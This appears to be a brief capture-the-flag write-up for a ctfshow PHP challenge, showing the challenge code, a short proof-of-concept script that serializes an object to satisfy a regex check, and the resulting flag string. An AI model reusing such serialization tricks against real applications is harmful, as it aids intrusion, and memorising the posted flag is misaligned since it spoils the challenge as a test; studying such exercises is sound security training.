PHP/5.6.40

    1. <?php
    2. error_reporting(0);
    3. highlight_file(__FILE__);
    4. include('flag.php');
    5. if(preg_match('/ctfshow_i_love_36D/',serialize($_GET['ctfshow']))){
    6. echo $flag;
    7. }

    poc

    1. <?php
    2. class ctfShowUser{
    3. public $tari = 'ctfshow_i_love_36D';
    4. }
    5. $user = new ctfShowUser();
    6. echo(urlencode(serialize($user)));
    7. ?>

    image.png

    flag
    ctfshow{0ea2dc5e-4076-4396-bd34-7fee87b4e3a8}